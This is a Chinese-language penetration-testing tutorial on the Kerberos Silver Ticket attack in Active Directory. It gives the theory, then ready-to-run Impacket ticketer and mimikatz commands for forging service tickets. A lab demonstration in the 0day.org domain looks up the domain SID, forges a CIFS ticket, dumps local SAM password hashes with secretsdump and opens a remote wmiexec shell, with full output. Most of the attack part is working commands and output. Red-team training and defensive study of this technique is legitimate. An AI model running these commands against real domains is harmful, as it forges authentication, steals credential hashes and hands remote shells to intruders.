1.白银票据

1. 理论

服务账户的长期密钥可以用来伪造服务票据(Service Ticket),之后可以结合 Pass-the-ticket 技术访问该服务。在白银票据(Silver Ticket)攻击场景中,攻击者会伪造一个服务票据,其中的 PAC(权限属性证书)包含了关于请求用户的任意信息,从而获得大量访问权限。

Silver Ticket(白银票据)会通过相应的服务账号来伪造 TGS,例如:LDAP、MSSQL、WinRM、DNS、CIFS 等,范围有限,只能获取对应服务权限。

2. 利用

要求

  • 域的SID
  • 服务账户的密钥

在伪造票据时,2021年11月之前,只要 user-id 和 group-id 合理,用户名基本无所谓。但自 2021 年 11 月的更新后,如果票据中填写的用户名在 Active Directory 中不存在,票据会被拒绝(白银票据同样如此)。

要制作白银票据,测试者需要获取目标服务账户的 RC4 密钥(即 NT hash)或 AES 密钥(128 或 256 位)。这可以通过捕获 NTLM 响应(最好是 NTLMv1)并破解、导出 LSA 密钥、DCSync 等方式获得。

“虽然白银票据的攻击范围比黄金票据更有限,但所需哈希更容易获取,并且在使用时无需与域控通信,因此比黄金票据更难被检测到。” https://adsecurity.org/?p=2011

2.1. linux

linux下还是用 Impacket 中的ticketer来进行伪造

# 查找域的 SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 

# 使用 NT hash 生成白银票据(Silver Ticket)
python ticketer.py -nthash "$NT_HASH" -domain-sid "$DomainSID" -domain "$DOMAIN" -spn "$SPN" "username"

# 使用 AES(128 或 256 位)密钥生成白银票据
python ticketer.py -aesKey "$AESkey" -domain-sid "$DomainSID" -domain "$DOMAIN" -spn "$SPN" "username"

SPN(服务主体名称)设置将对哪些服务可访问产生影响。例如, cifs/target.domainhost/target.domain 将允许大多数远程转储操作(更多信息请访问 adsecurity.org

2.2. windows

在 Windows 上,可以使用 mimikatzkerberos::golden 命令生成白银票据(Silver Ticket)。测试者需要根据实际用途,谨慎选择正确的 SPN 类型(如 cifs、http、ldap、host、rpcss 等)

# 使用 NT hash 生成白银票据(Silver Ticket)
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$serviceAccount_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

# 使用 AES 128 位密钥生成白银票据
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$serviceAccount_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

# 使用 AES 256 位密钥生成白银票据
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$serviceAccount_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

2.3. 其他

相比白银票据(Silver Ticket),一个更好且更隐蔽的替代方法是滥用 S4U2self。这种方式可以利用 Kerberos 委派功能,而不是伪造票据,来模拟目标机器上具有本地管理员权限的域用户。

  • Silver Ticket(白银票据)依赖于服务账号的密码散列值,这不同于 Golden Ticket 利用需要使用 krbtgt 账号的密码哈希值,因此更加隐蔽。
  • Golden Ticket 是由 krbtgt 账号加密的,而 Silver Ticket(白银票据)是由特定服务账号加密的。
  • 银票的特点是不需要与 KDC 进行交互,但代价是伪造的时候需要服务的 NTLM hash。

2.4. 演示

白银票据

# 查找域的 SID
┌──(root㉿kali)-[~/tmp]
└─# impacket-lookupsid -hashes :38fe728ae616f0fde13715e7c320685f  0day.org/administrator@192.168.3.142
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 192.168.3.142
[*] StringBinding ncacn_np:192.168.3.142[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1812960810-2335050734-3517558805
498: 0DAY\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: 0DAY\Administrator (SidTypeUser)
501: 0DAY\Guest (SidTypeUser)
502: 0DAY\krbtgt (SidTypeUser)
512: 0DAY\Domain Admins (SidTypeGroup)

# 使用 NT hash 生成白银票据(Silver Ticket)
┌──(root㉿kali)-[~/tmp]
└─# impacket-ticketer -nthash ed8136d84965a7958c2e4e0d84bf34b7 -domain-sid S-1-5-21-1812960810-2335050734-3517558805 -domain 0day.org -dc-ip 192.168.3.144 -spn cifs/OWA2010SP3.0day.org silver
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for 0day.org/silver
/usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
/usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in silver.ccache

#导入票据
┌──(root㉿kali)-[~/tmp]
└─# export KRB5CCNAME=silver.ccache      

#利用票据进行dcsync
┌──(root㉿kali)-[~/tmp]
└─# impacket-secretsdump   -k OWA2010SP3.0day.org                                                    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xe2daa1c5dca47d980c9c9a95b0409760
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

#利用票据进行PTH
┌──(root㉿kali)-[~/tmp]
└─# impacket-wmiexec -k OWA2010SP3.0day.org -codec gbk
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
0day.org\silver